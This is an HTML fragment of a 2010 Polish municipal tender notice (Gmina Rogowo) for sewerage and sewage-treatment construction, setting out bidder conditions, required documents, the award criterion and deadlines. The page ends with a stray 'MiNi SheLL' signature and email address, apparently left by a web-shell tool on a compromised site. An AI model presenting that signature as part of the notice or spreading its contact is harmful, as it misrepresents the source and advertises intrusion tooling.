a)	gdy w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy nie złożył dokumentów lub oświadczeń, o których mowa w art. 25ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie;
b)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
c)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
d)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja tego warunku nastąpi poprzez odesłanie do odrębnych przepisów, które wskazują na obowiązek posiadania uprawnień do wykonywania określonej działalności lub czynności. Wykazaniu spełnienia tego warunku może posłużyć odpowiedni dokument koncesji, zezwolenia lub licencji Wykonawcy (ubiegającego się o zamówienie publiczne-przyszła strona umowy).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do weryfikacji spełnienia tego warunku posłużą odpowiednio wykazy wykonanych robót budowlanych. Warunek ten będzie spełniony, jeżeli Wykonawcy udokumentują, że wykonali roboty budowlane w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonywania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawcy powinni udokumentować co najmniej dwie roboty budowlane w zakresie budowy kanalizacji sanitarnej do odprowadzania ścieków, przepompowni ścieków oraz wykonania obiektów budowlanych z infrastrukturą techniczną na oczyszczalni ścieków o wartości nie niższej niż 1 500 000,00 zł każda z nich.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.1.	Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:
a)	dysponuje maszynami i narzędziami budowlanymi minimum:
- koparko-spycharka kołowa o poj. łyżki 0,25 m3- 1 szt,
- koparka jednonaczyniowa kołowa 0,60 m3 - 1 szt,
- spycharka gąsienicowa 74 KW - 1 szt,
- samochód samowyładowczy o masie załadunku min. 5,0 ton- 2 szt,
- sprzęt do zagęszczenia gruntu ubijak spalinowy 50 kg - 2 szt,
- zestaw do odwodnienia liniowego (zestaw igłofiltrów z agregatem  pompowym  - 1 kpl,
- zestaw do wykonywania przecisków (metodą sterowaną) o średnicy               do 400 mm - 1 kpl.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi będącymi przedmiotem zamówienia o specjalnościach:
                 a)  konstrukcyjno - budowlanej min. w ograniczonym zakresie,
                 b)  instalacyjnej w zakresie instalacji wodociągowych i sieci kanalizacyjnych,
                 c)  instalacyjnej w zakresie instalacji elektrycznych,
                       d) drogowej.
Wykazane osoby powinny przynależeć do właściwej izby inżynierów budownictwa, jeżeli obowiązek przynależności do izby inżynierów budownictwa wynika z odrębnych przepisów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli Wykonawcy wykażą się odpowiednim potencjałem ekonomicznym tj. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, poprzez posiadanie na dzień składania ofert aktualnego dokumentu potwierdzającego wysokość posiadanych środków finansowych lub zdolność kredytową w wysokości nie mniejszą niż 500 000,00 zł oraz ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100 000,00 zł na okres realizacji zamówienia tj. do dnia 31 maja 2011r.  
Jeżeli z uzasadnionych przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (opinie, referencje).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wypełniony i podpisany przez Wykonawcę formularz oferty załącznik nr 1 do SIWZ,
b) oryginał pełnomocnictwa do reprezentowania (o ile ofertę składa pełnomocnik) lub kopia pełnomocnictwa poświadczona przez notariusza,
c) projekt umowy stanowiący załącznik nr  9 do SIWZ,
d) harmonogram rzeczowo-finansowy- załącznik nr 1 do projektu umowy,
 e) oświadczenie o udzieleniu 60 miesięcznej gwarancji na wykonane roboty budowlane liczonej od dnia odbioru przedmiotu wykonanego zamówienia przez Zamawiającego,
f) oświadczenie o udzieleniu  30 dniowego terminu płatności,
g) oświadczenie, że zapoznał się z treścią SIWZ oraz projektem umowy i akceptuje jej postanowienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć w chwili zawarcia umowy, Zamawiający odstąpi od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. 
3. Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, a dotyczących:
1)	rozszerzenia odpowiedzialności z tytułu rękojmi za wady oraz przedłużenia terminu udzielonej gwarancji w przypadku zaproponowania takiego rozwiązania przez Wykonawcę;
2)	zmiany kierownika robót bądź osób wskazanych do kontaktu w sprawach realizacji umowy w przypadku zdarzeń uniemożliwiających wykonywanie przez nich wskazanych funkcji; nowy kierownik budowy winien legitymować się uprawnieniami określonymi w SIWZ;
3)	zmiany terminu zakończenia realizacji inwestycji:
a)	z powodu okoliczności siły wyższej tj. klęski żywiołowej, warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych,
b)	w przypadku prowadzenia badań w wykopaliskach archeologicznych,
4)	zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu ze środków UE lub wytycznych dotyczących realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://rogowo.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rogowo, ul. Kościelna 8 88-420 Rogowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2010 godzina 11:00, miejsce: Ofertę należy złożyć w Urzędzie Gminy Rogowo ul. Kościelna 8, 88-420 Rogowo pok. 3-sekretariat (parter) do dnia 22 kwietnia 2010r. do godz. 11:00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowanie realizacji przedmiotu zamówienia w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 działanie Podstawowe usługi dla gospodarki i ludności wiejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com